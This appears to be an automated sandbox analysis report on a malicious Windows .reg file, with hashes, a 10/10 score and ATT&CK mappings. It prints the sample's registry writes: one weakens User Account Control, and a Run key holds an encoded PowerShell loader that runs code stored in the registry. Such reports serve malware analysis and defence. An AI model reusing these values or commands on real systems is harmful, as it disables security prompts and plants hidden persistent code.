Analysis
-
max time kernel
92s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2024 10:08
Static task
static1
Behavioral task
behavioral1
Sample
Semtrade GmbH 1844.reg
Resource
win7-20240708-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
Semtrade GmbH 1844.reg
Resource
win10v2004-20240802-en
windows10-2004-x64
3 signatures
150 seconds
General
-
Target
Semtrade GmbH 1844.reg
-
Size
2KB
-
MD5
94e4707ce189e14c226f1a5704ba5dc1
-
SHA1
255ce79e10dffa72a9974799577021a1aac021bb
-
SHA256
458d41071d5eb38b3ea89eec4fea6845d2a18a7253e62f2c639257f9b7ee79ec
-
SHA512
476a99ede08c1dc76ba01355cf87f6963f185711d99cec66463fc1b6fe4298e58dfc8481351dee34e386d835dc02d8a3be81f8c16118ed65d995ff0463a2401d
Score
10/10
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JdrURmeltLSPPenXVbW = "powershell -encodedCommand \"JgAgAHsAJABkACAAPQAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABpACIAKQAuAFIAbgBSADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGQAfQA=\"" regedit.exe -
Runs .reg file with regedit 1 IoCs
pid Process 5104 regedit.exe
Processes
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1